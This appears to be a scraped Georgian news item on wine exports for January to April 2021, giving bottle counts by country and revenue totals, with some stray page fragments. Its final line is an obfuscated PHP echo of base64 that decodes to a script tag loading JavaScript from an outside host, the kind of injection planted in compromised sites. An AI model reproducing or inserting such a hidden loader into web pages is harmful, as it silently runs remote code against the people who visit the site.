celsiusi
ავერსი შნაიდერი
2021 წლის იანვარ-აპრილში, საქართველოდან მსოფლიოს 55 ქვეყანაში  28,3 მლნ-მდე ბოთლი (0,75 ლ) ღვინოა ექსპორტირებული, რაც 15%-ით აღემატება 2020 წლის ანალოგიური პერიოდის მაჩვენებელს. 
 
როგორც WWW.BUSINESSTIME.GE-ის ღვინის ეროვნული სააგენტოდან აცნობეს, ექსპორტირებული ღვინის ღირებულება 65 მლნ-მდე აშშ დოლარია, ზრდამ, გასული წლის ამავე პერიოდთან შედარებით, 7%-ს მიაღწია. 
 
ექსპორტი გაიზარდა ქართული ღვინის სტრატეგიულ ბაზრებზე:  პოლონეთი - 2% (1,841,192 ბოთლი), ჩინეთი - 19% (1,559,533 ბოთლი), ლიეტუვა - 71% (356,748 ბოთლი), აშშ - 2% (325,468 ბოთლი), ესტონეთი - 3% (228,592 ბოთლი), გერმანია - 1% (229,527 ბოთლი) და დიდი ბრიტანეთი - 6% (157,932 ბოთლი).
 
აღნიშნულ პერიოდში, სხვადასხვა მოცულობის ქართული ღვინისა და ალკოჰოლიანი სასმელების ექსპორტი 252-მა კომპანიამ განახორციელა.
 
საქართველოდან ღვინის, ბრენდის, ჭაჭის, საბრენდე სპირტისა და ჩამოსასხმელი ბრენდის ექსპორტის შედეგად მიღებულია 106,3 მლნ აშშ დოლარის შემოსავალი, რაც 15%-ით მეტია გასული წლის ანალოგიური პერიოდის მაჩვენებელზე.
1101
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");